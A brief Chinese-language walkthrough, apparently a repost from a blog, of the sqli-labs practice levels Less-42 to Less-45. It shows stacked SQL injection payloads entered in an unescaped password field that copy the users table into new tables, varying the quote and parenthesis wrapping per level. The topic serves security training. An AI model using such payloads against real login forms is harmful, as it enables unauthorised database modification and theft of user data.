Less-42
打开这一关发现和之前的二次注入界面一样,使用admin admin登陆,发现回显正常
打开login.php文件,发现password没有经过mysqli_real_escape_string()函数进行处理,所以这个时候我们在这个位置进行构造,在password处使用堆叠构造
注入之前先把浏览器的password的type格式改为铭文格式,使用fn+f12打开body
然后可以在password里进行堆叠注入了
a
a‘;create table lxk42 like users;insert into lxk42 select * from users; # 发现报错
但我们发现和之前的表创建成功了
Less-43
这一关使用的包裹形式是?id=1‘) 其他均与第42关一样
a
a‘);create table lxk43 like users;insert into lxk43 select *from users; #
Less-44
这一关使用的包裹形式是单引号,且没有回显信息,这预示着我们不能使用报错注入,其他均和第42关一样
a‘;create table lxk44 like users;insert into lxk44 select *from users; #
Less-45
这一关使用的是单引号和括号进行包裹,没有回显信息,其余的均和第42关一样
a‘);create table lxk45 like users;insert into lxk45 select *from users; #
原文:https://www.cnblogs.com/heiwa-0924/p/12384591.html
如果您也喜欢它,动动您的小指点个赞吧
602392714
清零编程群